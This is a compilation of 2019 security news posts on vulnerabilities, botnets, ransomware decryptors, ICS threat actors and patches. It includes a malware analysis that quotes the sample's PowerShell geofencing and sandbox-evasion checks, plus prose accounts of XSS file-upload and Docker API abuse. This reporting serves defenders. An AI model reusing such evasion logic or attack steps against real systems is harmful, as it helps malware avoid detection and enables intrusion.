Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Experts believe that it just a matter of time before we will see threat actors exploiting the flaw in the wild.

“Right now, it is only a matter of time until someone publishes a working exploit or a malware author starts selling one on the underground markets. Should that happen, it will probably become very popular among less skilled cybercriminals and also a lucrative asset for its originator,” reads the post published by ESET.

BlueKeep will also show if organizations around the world learned a lesson after the large 2017 outbreaks and improved their security posture and patching routines.”

It has been estimated that roughly one million devices are vulnerable to attacks exploiting the BlueKeep Windows vulnerability and hackers are ready to hit them.

Most of the vulnerable systems are in China, followed by the United States.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Don’t waste time, patch your system!

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post DHS also issued an alert for the Windows BlueKeep flaw appeared first on Security Affairs.

Multiple DoS vulnerabilities affect Linux and FreeBSD

Netflix researcher has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels that could trigger a DoS condition.

Jonathan Looney, a security expert at Netflix, found three Linux DoS vulnerabilities, two of them related to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities, and one related only to MSS.

The most severe flaw, tracked as SACK Panic, could be exploited to remotely trigger a DOS condition and reboot vulnerable systems. The kernel panic flaw affects recent Linux kernels.

“Netflix has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels.” reads the security advisory. “The vulnerabilities specifically relate to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities.”

The denial of service flaw SACK Panic was tracked as CVE-2019-11477 and was rated as important severity, it received a 7.5 CVSS3 base score,  

“Netflix has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels.” reads the Netflix’s NFLX-2019-001 security advisory.

“The vulnerabilities specifically relate to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities. The most serious, dubbed “SACK Panic,” allows a remotely-triggered kernel panic on recent Linux kernels.

There are patches that address most of these vulnerabilities. If patches can not be applied, certain mitigations will be effective. We recommend that affected parties enact one of those described below, based on their environment.”

The SACK Panic vulnerability affects Linux kernels 2.6.29 and later, an attacker could exploit it by sending a crafted sequence of SACK segments on a TCP connection with a small value of TCP MSS that will trigger an integer overflow leading to a kernel panic.

“Apply the patch PATCH_net_1_4.patch. Additionally, versions of the Linux kernel up to, and including, 4.14 require a second patch PATCH_net_1a.patch,” continues Netflix Information Security’s advisory.

Below the advisories published by major Linux distros and cloud service providers:

The good news for Linux users is that most of the issues found by Netflix were already addressed with security patches. Mitigations are also available for those systems that cannot be immediately patched.

Users and administrator can mitigate the flaw by completely disabling SACK processing on the system or blocking connections with a low MSS. Netflix Information Security provided a series of filters to block the connections. Another mitigation consists of disabling TCP probing.

The remaining issued were respectively tracked as CVE-2019-11478 and CVE-2019-11479, both were rated as moderate severity vulnerabilities. The flaws affect all Linux versions. The CVE-2019-11478 issue could be exploitable by sending a crafted sequence of SACKs which will fragment the TCP retransmission queue. The CVE-2019-11479 issue could be exploited by attackers to trigger a DoS state by sending crafted packets with low MSS values to trigger excessive resource consumption.

CVE-2019-5599, aka SACK Slowness, affects FreeBSD 12 using the RACK TCP Stack. An attacker could exploit it by delivering a crafted sequence of SACKs which will fragment the RACK send map.

“It is possible to send a crafted sequence of SACKs which will fragment the RACK send map. An attacker may be able to further exploit the fragmented send map to cause an expensive linked-list walk for subsequent SACKs received for that same TCP connection.” continues the advisory.

CVE-2019-5599 can be addressed by applying “split_limit.patch and set the net.inet.tcp.rack.split_limit sysctl to a reasonable value to limit the size of the SACK table.”

Admins could also temporarily disable the RACK TCP stack.

“Good system and application coding and configuration practices (limiting write buffers to the necessary level, monitoring connection memory consumption via SO_MEMINFO, and aggressively closing misbehaving connections) can help to limit the impact of attacks against these kinds of vulnerabilities,” concludes Netflix Information Security.

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

The post Multiple DoS vulnerabilities affect Linux and FreeBSD appeared first on Security Affairs.

A free Decryptor tool for GandCrab Ransomware released

Good news for the victims of the latest variants of the GandCrab ransomware, NoMoreRansomware released a free decryption tool.

Victims of the latest variants of the GandCrab ransomware can now decrypt their files for free using a free decryptor tool released on the the NoMoreRansom website. The tool works with versions 5 to 5.2 of the ransomware, as well as versions 1 and 4. 

“On 17 June, a new decryption tool for the latest version of the most prolific ransomware family GandCrab has been released free of charge on www.nomoreransom.org.” reads the press release published by the Eurpol. “This tool allows victims of ransomware to regain access to their information encrypted by hackers, without having to pay demanded ransoms.”

The GandCrab decryptor tool is the result of a partnership with law enforcement agencies from Austria (Bundeskriminalambt – BMI), Belgium (Federal Computer Crime Unit), Bulgaria (General Directorate Combating Organized Crime – Cybercrime Department), France (Police Judiciaire de Paris – Befti), Germany (LKA Baden-Württemberg), the Netherlands (High Tech Crime Unit), Romania (DIICOT), the United Kingdom (NCA and Metropolitan Police), the United States (FBI) and Europol and its Joint Cybercrime Action Taskforce (J-CAT), together with the private partner Bitdefender.

The ransomware appeared in the threat landscape early 2018 when experts at cyber security firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab. The RaaS was advertised in Russian hacking community on the dark web, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

In more than one year its operators released several versions with numerous enhancements, but in June they announced they are shutting down their operation and affiliates are being told to stop distributing the ransomware.

GandCrab ransomware V4

In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.

The operators revealed they have generated more than $2 billion in ransom payments, earning on average of $2.5 million dollars per week. The operators also declared to have earned a net of $150 million that now have invested in legal activities.

Experts at BitDefender pointed out that not all victims are treated equally:

“GandCrab prioritizes ransomed information and sets individual pricing by type of victim.” read a blog post published by BitDefender. “An average computer costs from $600 and $2,000 to decrypt, and a server decryption costs $10,000 and more. While helping victims with decryption, we’ve seen ransom notes asking for as much as $700,000, which is quite a price for one wrong click,”

According to the Europol, previously released tools for the GandCrab ransomware have helped more than 30 000 victims recover their data for free and save roughly $50 million in unpaid ransoms. 

The joint efforts have also weakened the operators’ position on the cyber crime market and have led to the demise and shutdown of the operation by authorities. Bitdefender and McAfee experts provided a significant contribution to the fight against this threat. 

You can download the GandGrab decryption tool for free at the following address:

https://labs.bitdefender.com/wp-content/uploads/downloads/gandcrab-removal-tool-v1-v4-v5/

Pierluigi Paganini

(SecurityAffairs – ransomare, decryptor tools)

The post A free Decryptor tool for GandCrab Ransomware released appeared first on Security Affairs.

NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid

According to The New York Times, the United States planted destructive malware in Russia’s electric power grid.

The New York Times, citing current and former government officials, revealed that the United States planted a potentially destructive malware in Russia’s electric power grid.

The U.S. cyber army is targeting the Russian power grid since at least 2012 with reconnaissance operations, but recently it also carried out more offensive operations. According to the officials, US cyber soldiers attempted to deploy destructive malware inside the Russian power grid.

“Since at least 2012, current and former officials say, the United States has put reconnaissance probes into the control systems of the Russian electric grid.” states the NYT.

“But now the American strategy has shifted more toward offense, officials say, with the placement of potentially crippling malware inside the Russian system at a depth and with an aggressiveness that had never been tried before.”

Russian power grid

The hacking operations aimed at warning the Russian Government about the cyber capabilities of the U.S. Cyber Command and that could be used as a deterrent to the continuous interference attributed to Russian state-sponsored hackers. It is important to highlight that we have evidence that the malware used by the US Cyber units caused any disruption to the target systems.

President Trump publicly denied the revelation made by the NYT:

The New York Times added that according to two US officials Trump was completely informed about cyber operations conducted by the US Cyber Command. High officials inside the US Cyber Command might have hidden the details of the cyber attacks inside the Russian power grid fearing a possible reaction of the President due to its relationship with President Putin.

“Two administration officials said they believed Mr. Trump had not been briefed in any detail about the steps to place “implants” — software code that can be used for surveillance or attack — inside the Russian grid.” continues the newspaper.

“Pentagon and intelligence officials described broad hesitation to go into detail with Mr. Trump about operations against Russia for concern over his reaction — and the possibility that he might countermand it or discuss it with foreign officials, as he did in 2017when he mentioned a sensitive operation in Syria to the Russian foreign minister.”

In July 2018, the US Department of Homeland Security declared that Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and continue to target them.

“In the past few months, Cyber Command’s resolve has been tested. For the past year, energy companies in the United States and oil and gas operators across North America discovered their networks had been examined by the same Russian hackers who successfully dismantled the safety systems in 2017 at Petro Rabigh, a Saudi petrochemical plant and oil refinery.” concludes the NYT.

“The question now is whether placing the equivalent of land mines in a foreign power network is the right way to deter Russia. While it parallels Cold War nuclear strategy, it also enshrines power grids as a legitimate target.”

Pierluigi Paganini

(SecurityAffairs – Russian power grid, hacking)

The post NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid appeared first on Security Affairs.

From Targeted Attack to Untargeted Attack

Today I’d like to share an interesting and heavily obfuscated Malware which made me thinking about the meaning of ‘Targeted Attack’.

Nowadays a Targeted Attack is mostly used to address state assets or business areas. For example a targeted attack might address Naval industry (MartyMcFly example is definitely a great example) or USA companies (Botnet Against USA, Canada and Italy is another great example) and are mainly built focusing specific target sectors. When I looked into at the following sample (which is a clear stereotype of an increasing trend of similar threats) I noticed a paradigm shift from: “What to target” to “what to untarget”. In other words it looks like the attacker does’t have a clear vision about his desired victims but contrary he has real clear intentions to what kind of victims must be avoided. But let’s start from the beginning.

Looking for a public sample submitted to Yomi (Yoroi’s public SandBox system) it caught my eyes the following one (sha256: c63cfa16544ca6998a1a5591fee9ad4d9b49d127e3df51bd0ceff328aa0e963a)

Public Submitted Sample on Yomi

The file looks like a common XLS file within low Antivirus detection rate as shown in the following image (6/63).

Antivirus Detection Rate

By taking a closer look to the Office file it’s easy to spot “Auto Open” procedures in VBA. The initial script is obfuscated through integer conversion and variable concatenation. A simple break-point and a message box to externalize the real payload would be enough to expose the second stage, which happens to be written in powershell.

Deobfuscated Stage1 to Obfuscate Stage2

The second stage is obfuscated through function array enumeration and integer conversion as well. It took some minutes to understand how to move from the obfuscated version to a plain text readable format as shown in the next picture.

Stage2 Obfuscated
Stage2 DeObfuscated

Here comes the interesting side of the entire attack chain (at least in my persona point of view). As you might appreciate from the deo-bfuscated Stage2 code (previous image) two main objects are downloaded and run from external sources. The ‘*quit?’ object downloads a Windows PE (Stage3_a) and runs it, while the ‘need=js’ object returns an additional obfuscated javascript stage, let’s call it Stage3_b. We’ll take care about those stages later on, for now let’s focus on the initial conditional branch which discriminates the real behavior versus the fake behavior; in other words it decides if run or stop the execution of the real behavior. While the second side of the conditional branch is quite a normal behavior match "VirtualBox|VMware|KVM",which tries to avoid the execution on virtual environments (trying to avoid detection and analysis), the first side is quite interesting. (GET-UICulture).Name -match "RO|CN|UA|BY|RU" tries to locate the victim machine and decides to attack everybody but not Romania, Ukraine, China, Russia and Belarus. So we are facing an one’s complement to targeted attack. I’d like to call it “untargeted” attack, which is not an opportunistic attack. Many questions come in my mind, for example why do not attack those countries ? Maybe does the attacker fear those countries or does the attacker belong to that area ? Probably we’ll never get answers to such a questions but we might appreciate this intriguing attack behavior. (BTW, I’m aware this is not the first sample with this characteristic but I do know that it’s a increasing trend). But let’s move on the analysis.

Stage3_a

Stge3_b is clearly the last infection stage. It looks like a romantic Emotet according to many Antivirus so I wont invest timing into this well-known Malware.

Stage3_b

This stage looks like a quite big and obfuscated Javascript code. The obfuscation implements three main techniques:

  • Encoded strings. The strings have been encoded in different ways, from “to Integer” to “Hexadecimal”.
  • String concatenation and and dynamic evaluation. Using eval to dynamically extract values which would be used to decode more strings
  • String Substitutions. Through find and replace functions and using loop to extract sub-strings the attacker hides the clear text inside charset noise

After some “hand work” finally Stage3_b deobfuscated came out. The following image shows the deobfuscation versus obfuscation section. We are still facing one more obfuscated stage, lets call it Stage4_b which happens to be, again, an obfuscated powershell script… how about that !?

Stage3_b Obfuscated
Stage3_b Deobfuscated (obfuscated Stage4_b)


Stage4_b uses the same obfuscation techniques seen in Stage2, so let’s use the same deobfusction technique, so let’s do it ! Hummm, but .. wait a minute… we already know that, it’s the deobfuscated Stage2! So we have two command and control servers serving the final launching script and getting persistence on the victim.

Deobfuscated Stage4_b

Conclusion

Even if the Sample is quite interesting per-se – since getting a low AV detection rate – it is not my actual point today. What is interesting is the introduction of another “targeting” state. We were accustomed to see targeted attacks, by meaning of attacks targeting specific industries or specific sectors or specific states, and opportunistic attacks, by meaning of attacks spread all over the world without specific targets. Today we might introduce one more “attack type” the untargeted attack, by meaning of attacking everybody but not specific assets, industries or states (like in this analyzed case)

Further technical details, including IoCs and Yara rules are reported in the original post published on the Marco Ramilli’s blog:

https://marcoramilli.com/2019/06/17/from-targeted-attack-to-untargeted-attack/

About the author Marco Ramilli

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – targeted attack, hacking)



The post From Targeted Attack to Untargeted Attack appeared first on Security Affairs.

Hacker is targeting DNA sequencer applications from Iranian IP address

Threat actors are targeting Web-based DNA sequencer applications leveraging a still-unpatched zero-day to take over the targeted systems.

Starting from June 12, 2019, the researcher Ankit Anubhav from NewSky Security, observed threat actors targeting Web-based DNA sequencer applications. The attackers are leveraging a still-unpatched zero-day vulnerability, tracked as CVE-2017-6526, to gain full control over the targeted systems.

The vulnerability in dnaLIMS was reported to the vendor in 2017, but it is still unpatched.

The attackers are scanning the Internet for dnaLIMS, a web-based application to handle DNA sequencing operations, these devices are used in the research industry. The attacks were originated from the 2.176.78.42 IP address that is located in Iran.

“From June 12 – 14, we saw regular attacks from 2.176.78.42 , an IP located in Iran, utilizing CVE-2017-6526, an issue in dnaTools dnaLIMS 4-2015s13. According to dnatools.com, dnaLIMS™ is a Web based bioinformatics LIMS that provides scientists and researches with hardware independent software tools for processing and managing DNA sequencing requests.” reads a blog post published by the expert.

The hackers leverage the vulnerability to bind a shell and take control of the web server.

Why DNA sequencing apps?

Attackers could be interested in stealing hashes of DNA sequences from the application’s database to resell them on the dark web or compromising servers to add to their botnet.

We cannot exclude that threat actor behind these attacks are using exploit available online at random in the attempt of compromise the large number of systems.

It is still unclear why attackers are targeting DNA sequencing apps, the number of these devices is limited (only a few tens of devices exposed online) and it is unlike that hackers want to use compromise systems to carry out DDoS attacks.

“The exact motives of the attacker(s) is unknown. Unlike an IPCamera or Router based IoT device, these are very unique devices installed in scientific ,academic and medical institutions. As a result,the number of such devices is not very high and might not help greatly in DDoS.” concludes the expert.

“However, successful exploitation and DNA theft in specific cases can be fruitful. Either it can be sold in black market, or a high profile attacker can actually be looking for a specific persons’ data.

We are not aware of a patch for this bug. In fact, when we had a look at the original disclosure by ShoreBreakSecurity, we saw a funny disclosure response by the vendor,indicating they don’t take DNA theft seriously.”

The expert also analyzed historical activity related to the attacker’s IP address and discovered that it was also associated with nmap scans and with the use of two other exploits for Zyxel routers (CVE-2017-6884) and for Apache Struts flaw (CVE-2017-5638).

Pierluigi Paganini

(SecurityAffairs – DNA sequencer applications, hacking)

The post Hacker is targeting DNA sequencer applications from Iranian IP address appeared first on Security Affairs.

Bella Thorne published her private nude photos before a hacker that was threatening her

Bella Thorne is the last victim of a sextortion attack, in a case similar to the Fappening saga, a hacker threatened the actress to publish her private nude photos.

The hacker first obtained nude photos of Bella Thorne then threatened her to leak online the picture, but she gave an unsettling answer.

Bella Thorne published tweets of the stolen photos putting the hacker out of play.

The actress explained she has been harassed for the past 24 hours by a hacker who accessed to her nude photos.

bella thorne

The above message suggests that Bella Thorne has already reported to the authorities the sextortion attempts.

“For too long I let a man take advantage of me over and over and I’m f**king sick of it, I’m putting this out because it’s MY DECISION NOW U DONT GET TO TAKE YET ANOTHER THING FROM ME.” wrote the actress.

“I can sleep tonight better knowing I took my power back. U can’t control my life u never will.”

According to BleepingComputer, the hacker also shared with Thorne nude photos of other celebrities.

Pierluigi Paganini

(SecurityAffairs – Thorne, hacking)

The post Bella Thorne published her private nude photos before a hacker that was threatening her appeared first on Security Affairs.

New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits

Operators behind the Echobot botnet added new exploits to infect IoT devices, and also enterprise apps Oracle WebLogic and VMware SD-Wan.

Recently a new botnet, tracked Echobot, appeared in the threat landscape its operators are adding new exploits to infect a broad range of systems, including IoT devices, enterprise apps Oracle WebLogic and VMware SD-Wan.

The Echobot botnet was first detected by experts at PaloAlto Networks early this month, the botnet is based on the dreaded Mirai botnet. At the time of its discovery, operators added 8 new exploits, but currently, it includes 26 exploits.

The popular expert Larry Cashdollar, from Akamai’s Security Intelligence Response Team (SIRT), spotted a new version of the Echobot botnet that counts 26 different exploits.

“I recently came across an updated version of the Echobot binary that had some interesting additions. The first binary I found was compiled for ARM and still had the debugging information intact, which made it a little easier to analyze. While examining that binary, I discovered the system hosting the binaries and downloaded an x86 version that also still had the debugging symbols intact.” wrote the expert.

“I counted 26 different exploits that were being used in the spread of this botnet. Most were well-known command execution vulnerabilities in various networked devices.”

Cashdollar published a table comparing the two versions of Echobot and the exploits they use.

Echobot targets

The latest Echobot variant targets routers, network-attached storage devices (NAS), network video recorders (NVR), IP cameras, wireless presentation systems, and VoIP phones.

The experts pointed out that was not simple to determine the vulnerabilities that were being exploited by the botnet because some of them had no CVE numbers assigned.  

After the contacted MITRE, the organizations assigned them identification numbers.

Below the list of the exploits included in the Echobot variant discovered by the expert, some of the flaws triggered by the bot are decade-old vulnerabilities:

Echobot

The most interesting aspect of this new botnet is the fact that it also includes exploits for Oracle WebLogic Server and for networking software VMware SD-WAN.

“What I found the most interesting, and not so surprising, is the inclusion of cross-application vulnerabilities. For example, rather than sticking to devices with embedded OSs like routers, cameras, and DVRs, IoT botnets are now using vulnerabilities in enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) to infect targets and propagate malware.” added the expert.

“Also of note is the inclusion of 10+ year old exploits for network devices that I believe may never have been patched by the vendors. This alludes to the botnet developers deliberately targeting unpatched legacy vulnerabilities.”

Botnet operators continue to implement new methods to make their malware more aggressive and to infect the larger number of systems as possible. The latest Echobot variant targets flaws in IoT devices and in enterprise systems as well.

“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they’ve added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten.” concluded the expert.

“This is an interesting tactic as these systems if found have remained vulnerable for years and will probably remain vulnerable for many more. Also, there are not just new exploitation vectors to examine but attack vectors as well. New weaknesses in popular protocols and services that can be leveraged to amplify and reflect attacks will be discovered.”

Pierluigi Paganini

(SecurityAffairs – Echobot botnet, IoT)

The post New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits appeared first on Security Affairs.

Security Affairs newsletter Round 218 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

newsletter Digging The Deep Web

Once again thank you!

Critical RCE affects older Diebold Nixdorf ATMs
Facebook is going to stop Huawei pre-installing apps on mobile devices
Millions of Exim mail servers vulnerable to cyber attacks
CIA sextortion campaign, analysis of a well-organized scam
CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system
Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw
Retro video game website Emuparadise suffered a data breach
Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed
Spain extradites 94 Taiwanese to China phone and online fraud charges
Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash
Customs and Border Protection (CBP) confirms hack of a subcontractor
CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign
How Ursnif Evolves to Keep Threatening Italy
MuddyWater APT group updated its multi-stage PowerShell backdoor Powerstats
Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions
FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor
Google expert disclosed details of an unpatched flaw in SymCrypt library
Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws
Radiohead releases a trove of stolen music in response to the hack
RAMBleed, a new Side-Channel Attack that allows stealing sensitive data
Flaw in Evernote Web Clipper for Chrome extension allows stealing data
Massive DDos attack hit Telegram, company says most of junk traffic is from China
Ransomware paralyzed production for at least a week at ASCO factories
WAGO Industrial Switches affected by multiple flaws
Dissecting NanoCore Crimeware Attack Chain
French authorities released the PyLocky decryptor for versions 1 and 2
Millions of Exim mail servers are currently under attack
Mozilla addressed flaws in Thunderbird that allow code execution
Yubico is replacing for free YubiKey FIPS devices due to security weakness
Xenotime threat actor now is targeting Electric Utilities in US and APAC

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 218 – News of the week appeared first on Security Affairs.

XSS flaw would have allowed hackers access to Google’s network and impersonate its employees

Bug hunter Thomas Orlita discovered an XSS vulnerability in Google’s Invoice Submission Portal that would have allowed attackers access to Google’s internal network

The Czech researcher Thomas Orlita discovered an XSS vulnerability in Google’s Invoice Submission Portal that would have allowed attackers access to part of Google’s internal network.

The Google Invoice Submission Portal is a public portal used by Google’s business partners to submit invoices.

An attacker could also exploit the flaw to steal Google employee cookies for internal apps and hijack accounts or send spear-phishing messages.

The attack was devised by the expert in February, and Google addressed the issue in mid-April after the researcher reported it to the tech giant.

Orlita explained that an attacker could have uploaded malformed files in the Google Invoice Submission Portal, via the Upload Invoice field.

The expert noticed that the ‘upload’ feature for actual invoice in PDF format could be abused to upload HTML files. The attacker had to intercept a request and change the uploaded file’s filename and Content-Type properties to HTML.

Using this trick it was possible to store malicious files in Google’s invoicing system and would have executed automatically when an employee tried to access it.

Google xss Invoice Submission Portal

“Since this is just a front-end validation, it doesn’t stop us from changing the file type when sending the upload POST request. Once we select any PDF file, an upload request is fired. We can intercept the request using a web proxy debugger and change the filename and the contents from .pdf to .html.” reads the analysis published by the expert.

Orlita uploaded an HTML file including an XSS payload that, when triggered, would send him an email every time it was loaded.

A few days later, the expert received an email message showing that the JavaScript code in the XSS payload had been executed on the googleplex.com domain.

This domain is used by Google for hosting internal websites and apps. If you attempt to access the domain you will be redirected to a Google Corp login page for Google employees that requires the authentication.

“The DOM of the page matches the XSS payload that was put instead of the PDF file. We can see that this URL is used for displaying a PDF file. But since the Content-Type of the uploaded file was changed from application/pdf to text/html, it displayed and rendered the XSS payload instead of the PDF.” continues the expert.

According to the researcher, it was possible to exploit the flaw to execute arbitrary code on behalf of Google employees and gain access to sensitive information.

The expert pointed out that many Google internal apps are hosted on the googleplex.com domain, making this issue a gift for the attackers,

Below the timeline for the flaw:

21.02.2019: Vulnerability reported
22.02.2019: Priority changed to P2 
22.02.2019: Added more information 
25.02.2019: Accepted and priority changed to P1 
06.03.2019: Reward issued 
26.03.2019: A fix has been implemented 
11.04.2019: Issue marked as fixed

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

The post XSS flaw would have allowed hackers access to Google’s network and impersonate its employees appeared first on Security Affairs.

Crooks exploit exposed Docker APIs to build AESDDoS botnet

Cybercriminals are attempting to exploit an API misconfiguration in Docker containers to infiltrate them and run the Linux bot AESDDoS.

Hackers are attempting to exploit an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community to infiltrate containers and run the Linux bot AESDDoS (Backdoor.Linux.DOFLOO.AA).

Threat actors are actively scanning the Internet for exposed Docker APIs on port 2375 and use them to deliver a malicious code that drops the AESDDoS Trojan.

“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon.” reads the analysis published by Trend Micro. “Once an open port is identified, a connection asking for running containers is established. When a running container is spotted, the AESDDoS bot is then deployed using the docker exec command, which allows shell access to all applicable running containers within the exposed host. Hence, the malware is executed within an already running container while trying to hide its own presence.”

The AESDDoS malware is active since at least since 2014 and it was used to build large DDoS botnet. in some cases, it was also used in cryptojacking campaigns.

In recent months, threat actors focused their attention on misconfigured Docker services that could be abused for several malicious purposes.

“A batch file first executes the WinEggDrop scanner (s.exe), which tries port 2375 on various hosts with Chinese IP address ranges specified in the ip.txt file.” states the report. “The output of this command is saved into a file named ips.txt, which is then fed into the Docker.exe file.

We have also observed that the threat actor abuses a tool called the Docker Batch Test Tool that was developed to detect vulnerabilities in Docker.”

The malware also collects system information and send it back to the C2, depending on the specific hardware configuration the attackers can choose which kind of activity to carry out (i.e. launching DDoS attacker, mining cryptocurrency, etc.)

In the campaign observed by Trend Micro, the bot was deployed using the docker exec command to misconfigured containers.

The malware could allow the attackers to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The analysis published by Trend Micro includes technical details of the attacks and a list of Indicators of Compromise (IOCs).

In March, hundreds of Docker hosts were compromised in cryptojacking campaigns exploiting the CVE-2019-5736 runc vulnerability disclosed in February.

In order to secure Docker hosts admins should allow only trusted sources to access the Docker API, below some recommendations provided by Trend Micro.

“Docker explicitly warns against setting the Docker daemon to listen on port 2375 as this will give anyone the ability to gain root access to the host where the daemon is running, hence access to the API and address must be heavily restricted.” concludes the report.

“To prevent container-based incidents from happening, organizations can follow these guidelines:

  • Check API configuration. 
  • Implement the principle of least privilege. 
  • Follow recommended best practices. 
  • Employ automated runtime and image scanning to gain further visibility into the container’s processes (e.g., to determine if it has been tampered with or has vulnerabilities).”

Pierluigi Paganini

(SecurityAffairs – containers, hacking)


The post Crooks exploit exposed Docker APIs to build AESDDoS botnet appeared first on Security Affairs.

Xenotime threat actor now is targeting Electric Utilities in US and APAC

Experts at Dragos firm reported that Xenotime threat actor behind the 2017 Trisis/Triton malware attack is targeting electric utilities in the US and APAC.

Xenotime threat actor is considered responsible for the 2017 Trisis/Triton malware attack that hit oil and gas organizations.

In December 2017, the Triton malware  (aka Trisis) was discovered by researchers at FireEye, it was specifically designed to target industrial control systems (ICS) system.

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

In October 2018, FireEye experts discovered a link between the Triton malware, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), that is a Russian government research institute in Moscow.

Now, according to security firm Dragos, the group is targeting electric utilities in the United States and the Asia-Pacific (APAC) region.

“In February 2019, while working with clients across various utilities and regions, Dragos identified a persistent pattern of activity attempting to gather information and enumerate network resources associated with US and Asia-Pacific electric utilities.” reads a blog post published by Dragos.

“This behavior could indicate the activity group was preparing for a further cyberattack, or at minimum satisfying the prerequisites for a future ICS-focused intrusion.”

Xenotime has been active since at least 2014, its activity was discovered in 2017 after it caused a shutdown at a critical infrastructure organization somewhere in Saudi Arabia.

The group used a piece of malware known as Trisis, Triton and HatMan, and it targeted Schneider Electric’s Triconex safety instrumented systems (SIS) through a zero-day vulnerability. The attack was discovered after a SIS triggered a shutdown of some industrial systems, which experts believe hackers caused by accident.

Triton Xenotime

Dragos experts revealed that the attacks against entities in the United States and the APAC region were similar to ones that targeted organizations in the oil and gas sector. The good news is that all the attacks carried out by the Xenotime group failed into breaching the targeted organization.

“The activities are consistent with Stage 1 ICS Cyber Kill Chain reconnaissance and initial access operations, including observed incidents of attempted authentication with credentials and possible credential ‘stuffing,’ or using stolen usernames and passwords to try and force entry into target accounts.” continues the report.

Dragos warns that Xenotime poses a serious threat to electric utilities that uses ICS-SCADA systems similar to the ones in the oil and gas industries.

“Electric utility environments are significantly different from oil and gas operations in several aspects, but electric operations still have safety and protection equipment that could be targeted with similar tradecraft. XENOTIME expressing consistent, direct interest in electric utility operations is a cause for deep concern given this adversary’s willingness to compromise process safety – and thus integrity – to fulfill its mission.” continues the experts.

Dragos presented research on Xenotime at SecurityWeek’s 2018 ICS Cyber Security Conference held in Atlanta, below the video of the presentation:

“Dragos emphasizes that the observed behavior is an expansion, a proliferation of the threat, and not a shift – oil and gas entities must still grapple with this adversary’s activity.” concludes Dragos. “While unfortunate, the expansion should serve as a clear signal to ICS operators – not only in oil and gas or electric utility operations – that the time to plan, implement, and enforce security standards and response processes in industrial environments is now.”

Pierluigi Paganini

(SecurityAffairs – Triton malware, Xenotime)

The post Xenotime threat actor now is targeting Electric Utilities in US and APAC appeared first on Security Affairs.

Mozilla addressed flaws in Thunderbird that allow code execution

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could allow code execution on impacted systems. 

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could be exploited by attackers to execute arbitrary code on impacted systems. 

Mozilla released Thunderbird version 60.7.1 that addresses three High severity vulnerabilities and one Low risk issue. 

The three High severity vulnerabilities addressed by Mozilla are:

  • CVE-2019-11703 – heap buffer overflow in the function icalparser.c;
  • CVE-2019-11704 – heap buffer overflow in the function icalvalue.c;
  • CVE-2019-11705 – stack buffer overflow in the function calrecur.c; 

The Low risk issue, tracked as CVE-2019-11706, is a type confusion in icalproperty.c. 

“Mozilla has released a security update to address vulnerabilities in Thunderbird. An attacker could exploit these vulnerabilities to take control of an affected system.” reads the advisory published by the US-CERT.

“The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for Thunderbird 60.7.1 and apply the necessary update.” 

The vulnerabilities affect all the Thunderbird versions prior to 60.7.1.  

Depending on the user’s privileges, an attacker could carry out several malicious activities, such as installing malicious applications and creating new admin accounts. 

